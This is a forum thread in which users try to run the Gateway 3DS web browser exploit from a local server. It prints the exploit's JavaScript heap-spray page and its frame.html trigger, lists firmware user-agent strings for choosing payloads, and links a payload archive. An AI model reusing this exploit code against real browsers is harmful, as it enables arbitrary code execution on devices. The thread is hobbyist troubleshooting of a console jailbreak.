Hacking [Attempt] Running GW3.0 Web Exploit on a Local Network

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.

So the question is, since the browser exploit just loads launcher.dat from the SD card ( smc://launcher.dat ), should it work just the same on my network? The xampp install works fine.



The files I used for my solution were from Falo:

The region doesn't matter, I made a simple C# app to download all of the different payloads and only the version string matters.

fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"

So there are 5 different payloads.
Here are the payloads in HTML and as binary .dat:

http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z

There were various instructions from others in this thread, read for details.
 
Reactions: bowser

Venseer

A weapon to surpass Metal Gear
Member
Joined
Dec 12, 2013
Messages
198
Trophies
0
Age
31
Location
Kennedy Space Center
XP
297
Country
Brazil
> I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.
>
> So the question is, since the browser exploit just loads launcher.dat from the SD card ( smc://launcher.dat ), should it work just the same on my network? The xampp install works fine.

Anyone have a solution?
It's a PHP page
Maybe there is hidden PHP code on it? Not sure
 
Reactions: Kelton2

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
Just to get it out of the way, this is the html on the page in question,
HTML:
<html>
<head>
<style>
    body {
        color:white;
        background:black;
    }
   
   
</style>
<script>
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
        mem.push(t);
    }
 
    function dsm(evnt) {
        var mem = [];
 
        for (var j = 20; j < 430; j++) {
            magicfun(mem, j, unescape("\u0000\u08e0\u0004\u08e0\u0008\u08e0\u000c\u08e0\u0010\u08e0\u0014\u08e0\u0018\u08e0\u001c\u08e0\u0020\u08e0\u0024\u08e0\u0028\u08e0\u002c\u08e0\u0030\u08e0\u0034\u08e0\u0038\u08e0\u003c\u08e0\u0040\u08e0\u0044\u08e0\u0048\u08e0\u004c\u08e0\u0050\u08e0\u0054\u08e0\u0058\u08e0\u005c\u08e0\u0060\u08e0\u0064\u08e0\u0068\u08e0\u006c\u08e0\u0070\u08e0\u0074\u08e0\u0078\u08e0\u007c\u08e0\u0080\u08e0\u0084\u08e0\u0088\u08e0\u008c\u08e0\u0090\u08e0\u0094\u08e0\u0098\u08e0\u009c\u08e0\u00a0\u08e0\u00a4\u08e0\u00a8\u08e0\u00ac\u08e0\u00b0\u08e0\u00b4\u08e0\u00b8\u08e0\u00bc\u08e0\u00c0\u08e0\u00c4\u08e0\u00c8\u08e0\u00cc\u08e0\u00d0\u08e0\u00d4\u08e0\u00d8\u08e0\u00dc\u08e0\u00e0\u08e0\u00e4\u08e0\u00e8\u08e0\u00ec\u08e0\u00f0\u08e0\u00f4\u08e0\u00f8\u08e0\u00fc\u08e0\u0100\u08e0\u0104\u08e0\u0108\u08e0\u010c\u08e0\u0110\u08e0\u0114\u08e0\u0118\u08e0\u011c\u08e0\u0120\u08e0\u0124\u08e0\u0128\u08e0\u012c\u08e0\u0130\u08e0\u0134\u08e0\u0138\u08e0\u013c\u08e0\u0140\u08e0\u0144\u08e0\u0148\u08e0\u014c\u08e0\u0150\u08e0\u0154\u08e0\u0158\u08e0\u015c\u08e0\u0160\u08e0\u0164\u08e0\u0168\u08e0\u016c\u08e0\u0170\u08e0\u0174\u08e0\u0178\u08e0\u017c\u08e0\u0180\u08e0\u0184\u08e0\u0188\u08e0\u018c\u08e0\u0190\u08e0\u0194\u08e0\u0198\u08e0\u019c\u08e0\u01a0\u08e0\u01a4\u08e0\u01a8\u08e0\u01ac\u08e0\u01b0\u08e0\u01b4\u08e0\u01b8\u08e0\u01bc\u08e0\u01c0\u08e0\u01c4\u08e0\u01c8\u08e0\u01cc\u08e0\u01d0\u08e0\u01d4\u08e0\u01d8\u08e0\u01dc\u08e0\u01e0\u08e0\u01e4\u08e0\u01e8\u08e0\u01ec\u08e0\u01f0\u08e0\u01f4\u08e0\u01f8\u08e0\u01fc\u08e0"));
        }
    }
</script>
</head>
<body>
        <h1 align="center">GATEWAY 3DS LOADING...</h1>
</body>
</html>

It should run no matter what server it is on right? ( local or not )
 

hias

Active Member
Newcomer
Joined
Jun 16, 2014
Messages
32
Trophies
0
Age
44
XP
132
Country
Argentina
No, you downloaded the wrong file, you miss the hidden iframe and the correct payload.
Check my post on the main thread.
Visit the site on your pc using the correct 3ds user agent and try again please :)
 
Reactions: Margen67

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
> No, you downloaded the wrong file, you miss the hidden iframe and the correct payload.
> Check my post on the main thread.
> Visit the site on your pc using the correct 3ds user agent and try again please :)

So that's the issue, will move to a normal internet connection and try again.

Does anyone have the contents of the iframe?
 

hias

Active Member
Newcomer
Joined
Jun 16, 2014
Messages
32
Trophies
0
Age
44
XP
132
Country
Argentina
The iframe just executes the javascript code via event. Not sure if this is needed and part of the browser bug. The important part is the correct payload.
 

Thomas12345

Well-Known Member
Member
Joined
Dec 1, 2014
Messages
551
Trophies
0
Age
36
XP
281
Country
Canada
The frame.html

Code:
<html>
        <head>
                <script>
                        var nb = 0;
                        function handleBeforeLoad() {
                                if (++nb == 1) {
                                        p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                                } else if (nb == 2) {
                                        p.removeChild(f);
                                }
                        }
 
                        function documentLoaded() {
                                f = window.frameElement;
                                p = f.parentNode;
                                var o = document.createElement("object");
                                o.addEventListener('beforeload', handleBeforeLoad, false);
                                document.body.appendChild(o);
                        }
 
                        window.onload = documentLoaded;
                </script>
        </head>
        <body>
                KEKEKEKEK...
        </body>
</html>
 
Reactions: Margen67 and bendrr

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
> The frame.html
>
> Code:
> <html>
>         <head>
>                 <script>
>                         var nb = 0;
>                         function handleBeforeLoad() {
>                                 if (++nb == 1) {
>                                         p.addEventListener('DOMSubtreeModified', parent.dsm, false);
>                                 } else if (nb == 2) {
>                                         p.removeChild(f);
>                                 }
>                         }
>
>                         function documentLoaded() {
>                                 f = window.frameElement;
>                                 p = f.parentNode;
>                                 var o = document.createElement("object");
>                                 o.addEventListener('beforeload', handleBeforeLoad, false);
>                                 document.body.appendChild(o);
>                         }
>
>                         window.onload = documentLoaded;
>                 </script>
>         </head>
>         <body>
>                 KEKEKEKEK...
>         </body>
> </html>


Thanks, will try it
 
Reactions: Margen67

Helper

Well-Known Member
Member
Joined
Sep 14, 2009
Messages
136
Trophies
0
XP
227
Country
United States
Are y'all entirely certain the web browser entrypoint only loads launcher.dat? If so, why--do you have evidence to suggest so?
If not, I'd probably try sniffing the network to see if the 3DS downloads any other data when the exploit is executed (in the normal way, from the GW website).

Also, could you clarify "just loads the page and does nothing"? I assume this means 'I see "GATEWAY 3DS LOADING"; the web browser does not close with an error or otherwise misbehave'; is this correct?

(I'm a useless asshole who can't help you anyway--sorry ;_;. I'm just interested in the browser exploit.)
 

andzalot55

I'm very delicious. mmmm.
Member
Joined
Nov 14, 2014
Messages
808
Trophies
0
Location
Mc Donalds.
XP
2,093
Country
Canada
> I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.
>
> So the question is, since the browser exploit just loads launcher.dat from the SD card ( smc://launcher.dat ), should it work just the same on my network? The xampp install works fine.
>
> Anyone have a solution?


Have you tried the QR Code version? I saw a post about it.
 

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
> Are y'all entirely certain the web browser entrypoint only loads launcher.dat? If so, why--do you have evidence to suggest so?
> If not, I'd probably try sniffing the network to see if the 3DS downloads any other data when the exploit is executed (in the normal way, from the GW website).
>
> Also, could you clarify "just loads the page and does nothing"? I assume this means 'I see "GATEWAY 3DS LOADING"; the web browser does not close with an error or otherwise misbehave'; is this correct?
>
> (I'm a useless asshole who can't help you anyway--sorry ;_;. I'm just interested in the browser exploit.)



The browser closes with an error after the page loads asking me to restart the 3ds when I load the exploit locally. I do see gateway 3ds loading... before it closes.
 

Helper

Well-Known Member
Member
Joined
Sep 14, 2009
Messages
136
Trophies
0
XP
227
Country
United States
> The browser closes with an error after the page loads asking me to restart the 3ds when I load the exploit locally. I do see gateway 3ds loading... before it closes.
Interesting. And that's the error which asks you to save and then restart it yourself--not the one which forces a shutdown as soon as you acknowledge the message?

If it's the latter, I'd say something has gone very wrong somewhere. But if it's the former, I think you're almost there. I kept getting the error message upon loading the page; I finally got it to work by placing launcher.dat on a different, newly-formatted SD card. Anyway, it sounds like you have your server set up perfectly--kudos for that!
 

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
The first error you mentioned is the one. I looked at the javascript functions that I see and it's a buffer overload I think. Wonder why it's not working. The console doesn't throw any errors with default settings. I wonder what firebug would report if anything.

*edit
Just an undefined error, no specifics so far. It's my network I'm positive but I wonder why it can't be executed off their server. If it matters to anyone with the same error, I also get "Failed to load part of this page" when trying to use it locally.

If they enabled ssl for the /go/ folder, that would solve some problems for me (and others?).

Another note, wish they would release the index.php and javascript for a backup url and even better, offline mode. I suppose offline mode is in the next update maybe? The index file has some of the exploit, calculations I think?

Any ideas?
 
